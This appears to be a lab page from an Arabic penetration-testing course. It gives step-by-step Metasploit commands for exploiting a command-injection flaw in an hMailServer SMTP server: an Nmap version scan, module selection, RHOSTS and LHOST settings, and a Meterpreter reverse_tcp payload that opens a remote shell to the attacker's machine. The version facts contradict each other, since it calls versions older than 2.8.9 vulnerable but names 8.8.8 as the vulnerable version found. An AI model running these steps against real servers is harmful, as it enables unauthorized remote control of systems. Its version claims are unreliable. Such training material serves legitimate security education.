🧪 المختبر العملي 15 : استغلال خادم SMTP ضعيف (Vulnerable SMTP Server Lab)

🎯 الهدف الأساسي: استغلال ثغرة حقن الأوامر (Command Injection) في خادم HmailServer SMTP (الإصدارات الأقدم من 2.8.9) للحصول على جلسة Meterpreter على النظام المستهدف .

🔧 الأدوات المستخدمة:

Nmap: لاكتشاف خدمة SMTP وتحديد إصدارها.
MSFconsole: واجهة Metasploit الرئيسية.
Exploit Module: windows/smtp/hmailserver_chm_cmd_exec.
Meterpreter Payload: للحصول على تحكم كامل بعد الاستغلال.

📜 خطوات التنفيذ:

📊 مرحلة الاستطلاع (Reconnaissance) وتقييم الثغرات (Vulnerability Assessment)

🚀 بدء تشغيل MSFconsole وتحديد عنوان IP للهدف:
- ابدأ msfconsole:
  msfconsole -q
- حدد عنوان IP للهدف .
💡 إجراء فحص Nmap لاكتشاف خدمة SMTP وتحديد إصدارها:
- 🔧 فحص Nmap لإصدار الخدمة على المنفذ 25:
  nmap -sV -p 25 [Target_IP_Address]
- إذا نفذت هذا الأمر، ستُظهر لك النتائج أن خدمة SMTP تعمل على المنفذ 25، والبرنامج هو hMailServer والإصدار (مثلاً: 8.8.8).
- 🔗 ربط سلسلة الأدوات: معرفة هذا الإصدار حاسمة لتحديد الاستغلال المناسب في Metasploit، حيث أن إصدارات HmailServer الأقدم من 2.8.9 معروفة بوجود ثغرة حقن الأوامر.
🔑 البحث عن وحدة الاستغلال في Metasploit:
- 🔧 البحث عن الوحدة:
  search hmailserver
- إذا نفذت هذا الأمر، ستظهر لك وحدة الاستغلال windows/smtp/hmailserver_chm_cmd_exec.
- 🔑 استخدام الوحدة:
  use exploit/windows/smtp/hmailserver_chm_cmd_exec
- إذا نفذت هذا الأمر، سيتم تحميل وحدة الاستغلال.

📊 مرحلة الاستغلال (Exploitation)

⚙️ تعيين الخيارات (Options):

عرض الخيارات المطلوبة:
```
show options
```

تعيين عنوان IP للهدف (RHOSTS) وعنوان IP للمهاجم (LHOST):

set RHOSTS [Target_IP_Address]
set RPORT 25 # منفذ SMTP
set LHOST [Your_Kali_IP_Address]
set LPORT 4444
set PAYLOAD windows/meterpreter/reverse_tcp # لتحديد حمولة Meterpreter

🚀 تشغيل الاستغلال:
- 🔑 تنفيذ الاستغلال:
  exploit
- إذا نفذت هذا الأمر، سيتم تشغيل الاستغلال. في حال نجاحه، ستظهر لك رسالة Meterpreter session 1 opened.

📊 مرحلة ما بعد الاستغلال (Post-Exploitation)

✅ التحقق من معلومات النظام:
- بمجرد الحصول على جلسة Meterpreter، يمكنك جمع معلومات عن النظام المستهدف.
- للحصول على معلومات النظام:
  sysinfo
- إذا نفذت هذا الأمر، ستُعرض لك معلومات تفصيلية عن نظام التشغيل المستهدف.

✅ نقاط التحقق:

يجب تحديد إصدار HmailServer (8.8.8).
يجب أن يتم فتح جلسة Meterpreter بنجاح.
يجب أن تتمكن من تنفيذ أوامر Meterpreter مثل sysinfo.

Previous🧪 المختبر العملي 14 : استغلال خادم SSH ضعيف (Vulnerable SSH Server Lab)Next🧪 المختبر العملي 16: ترقية أصداف الأوامر إلى أصداف Meterpreter (Upgrading Command Shells To Mete

Last updated 4 months ago

hashtag📊 مرحلة الاستطلاع (Reconnaissance) وتقييم الثغرات (Vulnerability Assessment)

hashtag📊 مرحلة الاستغلال (Exploitation)

hashtag📊 مرحلة ما بعد الاستغلال (Post-Exploitation)

📊 مرحلة الاستطلاع (Reconnaissance) وتقييم الثغرات (Vulnerability Assessment)

📊 مرحلة الاستغلال (Exploitation)

📊 مرحلة ما بعد الاستغلال (Post-Exploitation)